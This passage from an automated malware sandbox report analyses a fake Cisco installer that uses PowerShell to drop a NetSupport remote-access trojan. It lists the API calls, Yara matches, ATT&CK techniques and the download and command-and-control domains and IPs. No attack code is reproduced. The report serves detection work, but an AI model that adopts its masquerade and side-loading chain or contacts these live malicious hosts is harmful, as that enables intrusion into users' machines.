                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1101D180 SetRect,GetLocalTime,11_2_1101D180
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1103B220 GetUserNameA,11_2_1103B220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C5A220 _ftime64_s,_errno,_invalid_parameter_noinfo,_get_timezone,GetSystemTimeAsFileTime,GetTimeZoneInformation,_invoke_watson,_ftime64,12_2_68C5A220
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,11_2_1109D4A0
                                  Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                  Source: is-J44M9.tmp.6.drBinary or memory string: r?IsOs_WIN_VISTA@@YA_NXZ
                                  Source: is-J44M9.tmp.6.drBinary or memory string: ?SetOperationPending@CCEvent@@QAEXXZm??0CCEvent@@QAE@AAJPAXW4EVENT_HANDLE_TYPE@0@PB_W@Zl?IsOs_WIN_7_Only@@YA_NXZ
                                  Source: is-J44M9.tmp.6.drBinary or memory string: n?IsOs_WIN_8@@YA_NXZ
                                  Source: is-J44M9.tmp.6.drBinary or memory string: ?SetConnectMessageType@CConnectIfcDataTLV@@QAEJG@Z}??0CConnectIfcDataTLV@@QAE@AAJAAVCIpcResponseInfo@@P6AJAAPAVIDataCrypt@@@Z@Z|??0CConnectIfcDataTLV@@QAE@AAJAAVCIpcMessage@@P6AJAAPAVIDataCrypt@@@Z@Zr?IsOs_WIN_VISTA@@YA_NXZ
                                  Source: is-J44M9.tmp.6.drBinary or memory string: l?IsOs_WIN_7_Only@@YA_NXZ
                                  Source: is-J44M9.tmp.6.drBinary or memory string: ?Run@CNetshCommand@@QAEPAVCNetshResponse@@AAJ@Zk?IsOs_WIN_7@@YA_NXZ
                                  Source: is-J44M9.tmp.6.drBinary or memory string: ?Start@CThread@@QAEJXZn?IsOs_WIN_8@@YA_NXZ
                                  Source: is-J44M9.tmp.6.drBinary or memory string: k?IsOs_WIN_7@@YA_NXZ
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1106F210 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,11_2_1106F210
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689BA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,11_2_689BA980
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1106F210 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,12_2_1106F210
                                  Source: Yara matchFile source: 13.2.client32.exe.68cb0000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.2.client32.exe.68cb0000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.client32.exe.68cb0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.client32.exe.68cc0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.2.client32.exe.68cc0000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.client32.exe.68cc0000.6.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.client32.exe.689b0000.3.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 12.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000D.00000000.69327908302.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000000.69246854158.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.70082150611.00000000027FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000002.69248279133.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000D.00000002.69329343216.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000000.69135758155.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.69180702830.0000000009FC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.70080906135.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4288, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7744, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4252, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\HTCTL32.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\PCICHEK.DLL, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure2
                                  Valid Accounts
                                  1
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  1
                                  Disable or Modify Tools
                                  1
                                  Network Sniffing
                                  12
                                  System Time Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  1
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts3
                                  Native API
                                  2
                                  Valid Accounts
                                  2
                                  Valid Accounts
                                  1
                                  Deobfuscate/Decode Files or Information
                                  111
                                  Input Capture
                                  1
                                  Account Discovery
                                  Remote Desktop Protocol1
                                  Screen Capture
                                  21
                                  Encrypted Channel
                                  Exfiltration Over Bluetooth1
                                  Defacement
                                  Email AddressesDNS ServerDomain Accounts1
                                  Command and Scripting Interpreter
                                  11
                                  Registry Run Keys / Startup Folder
                                  21
                                  Access Token Manipulation
                                  4
                                  Obfuscated Files or Information
                                  Security Account Manager1
                                  System Service Discovery
                                  SMB/Windows Admin Shares111
                                  Input Capture
                                  3
                                  Non-Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  PowerShell
                                  Login Hook12
                                  Process Injection
                                  11
                                  Software Packing
                                  NTDS3
                                  File and Directory Discovery
                                  Distributed Component Object Model3
                                  Clipboard Data
                                  4
                                  Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                                  Registry Run Keys / Startup Folder
                                  1
                                  DLL Side-Loading
                                  LSA Secrets1
                                  Network Sniffing
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                                  Masquerading
                                  Cached Domain Credentials35
                                  System Information Discovery
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                  Valid Accounts
                                  DCSync151
                                  Security Software Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                  Virtualization/Sandbox Evasion
                                  Proc Filesystem2
                                  Virtualization/Sandbox Evasion
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                  Access Token Manipulation
                                  /etc/passwd and /etc/shadow2
                                  Process Discovery
                                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                  Process Injection
                                  Network Sniffing11
                                  Application Window Discovery
                                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture3
                                  System Owner/User Discovery
                                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546280 URL: https://asknetsupertech.com... Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 57 payiki.com 2->57 59 asknetsupertech.com 2->59 61 2 other IPs or domains 2->61 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Sigma detected: Powershell drops NetSupport RAT client 2->81 83 4 other signatures 2->83 9 CiscoSetup.exe 2 2->9         started        12 cmd.exe 2 2->12         started        14 client32.exe 2->14         started        16 client32.exe 2->16         started        signatures3 process4 file5 47 C:\Users\user\AppData\...\CiscoSetup.tmp, PE32 9->47 dropped 18 CiscoSetup.tmp 25 346 9->18         started        22 wget.exe 2 12->22         started        25 conhost.exe 12->25         started        process6 dnsIp7 37 C:\Users\user\AppData\Local\...\cispn.ps1, ASCII 18->37 dropped 39 C:\Program Files (x86)\Cisco\unins000.dat, InnoSetup 18->39 dropped 41 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 18->41 dropped 45 96 other files (none is malicious) 18->45 dropped 85 Bypasses PowerShell execution policy 18->85 27 powershell.exe 1 55 18->27         started        63 asknetsupertech.com 54.37.62.77, 443, 49755 OVHFR France 22->63 43 C:\Users\user\Desktop\...\CiscoSetup.exe, PE32 22->43 dropped file8 signatures9 process10 file11 49 C:\Users\user\AppData\...\remcmdstub.exe, PE32 27->49 dropped 51 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 27->51 dropped 53 C:\Users\user\AppData\...\client32.exe, PE32 27->53 dropped 55 7 other files (6 malicious) 27->55 dropped 87 Found suspicious powershell code related to unpacking or dynamic code loading 27->87 89 Loading BitLocker PowerShell Module 27->89 91 Powershell drops PE file 27->91 31 client32.exe 18 27->31         started        35 conhost.exe 27->35         started        signatures12 process13 dnsIp14 65 anyhowdo.com 199.188.200.195, 443, 49758 NAMECHEAP-NETUS United States 31->65 67 payiki.com 151.236.16.15, 443, 49756 HVC-ASUS European Union 31->67 69 geo.netsupportsoftware.com 172.67.68.212, 49757, 80 CLOUDFLARENETUS United States 31->69 71 Contains functionalty to change the wallpaper 31->71 73 Contains functionality to register a low level keyboard hook 31->73 75 Contains functionality to detect sleep reduction / modifications 31->75 signatures15

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-KVJK8.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-SHB4H.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-FVJ6D.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T5R7J.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)0%ReversingLabs
